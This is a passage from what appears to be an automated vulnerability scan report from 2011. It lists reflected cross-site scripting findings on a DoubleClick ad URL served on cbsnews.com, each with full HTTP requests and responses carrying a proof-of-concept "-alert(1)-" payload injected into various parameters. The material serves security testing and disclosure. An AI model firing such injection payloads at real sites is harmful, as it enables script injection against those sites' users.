Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5760

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fa
...[SNIP]...

3.104. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902bf"-alert(1)-"e7b97166ecf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
48298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.
...[SNIP]...

3.105. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 721eb"-alert(1)-"5e3375eee1a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=5
...[SNIP]...

3.106. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82d00"-alert(1)-"a0d2f28156c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "op
...[SNIP]...

3.107. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44562"-alert(1)-"289e63f792d was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=20
...[SNIP]...

3.108. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc8ee"-alert(1)-"db20965c259 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "
...[SNIP]...

3.109. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac86f"-alert(1)-"e9cbd23bb73 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpr
...[SNIP]...

3.110. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 404ce"-alert(1)-"ab245d7300d was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/160/%2a/r%3B234979442%3B3-0%3B0%3B57848298%3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra
...[SNIP]...

3.111. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d202"-alert(1)-"0e7554cedd3 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
9442%3B3-0%3B0%3B57848298%3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641
...[SNIP]...

3.112. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24b5c"-alert(1)-"693c8060cdc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=
...[SNIP]...

3.113. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72656"-alert(1)-"4f84709e101 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

